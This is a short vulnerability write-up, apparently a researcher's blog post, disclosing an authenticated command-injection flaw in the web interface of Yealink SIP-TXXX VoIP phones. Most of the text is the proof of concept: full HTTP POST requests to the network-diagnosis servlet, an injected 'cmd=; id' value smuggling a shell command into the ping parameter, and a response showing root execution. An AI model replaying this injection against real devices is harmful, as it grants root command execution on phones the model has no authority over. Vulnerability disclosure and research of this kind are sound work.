Do you love hacking Phones? well of course VOIP phones , this should be worth a read!

Just unconvered a vulnerability that existed in Yealink SIP-TXXX, This vulnerability leads to RCE , but it's Authenticated meaning you must be logged in to the web interface!


Proof Of Concept

After logging in to the web interface which by any chance can be port 80 or port 443 , there is a Network tab clicking on it , there are 5 sections Basic,PC Port,NAT,Advanced,and Diagnostics, Clicking on Diagnostics:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

and there we can ping or perform traceroute command upon an IP address , capturing that request with burpsuite will reveal how the whole thing should look and how the parameters are sent with their values;

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=start ping 127.0.0.1&token=1714636915c6acea98

so the parameter cmd takes the value start then the command to execute ping 127.0.0.1, so I thought of it as an easy win , where as I changed the value of the parameter cmd to take another value to execute instead of ping by an easy basic linux command:

cmd=; id;&token=1714636915c6acea98

and now it will execute id command instead!

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

POST REQUEST

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.6597899560162612 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d2446809c4f88
Connection: close

cmd=; id&token=1957747793cee22738

RESPONSE

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
	<div id="_RES_INFO_">
            uid=0(root) gid=0(root)
        </div>
</body>
</html>

And there we have RCE! :100:

Contact : Twitter: tahaafarooq, Telegram : tahaafarooq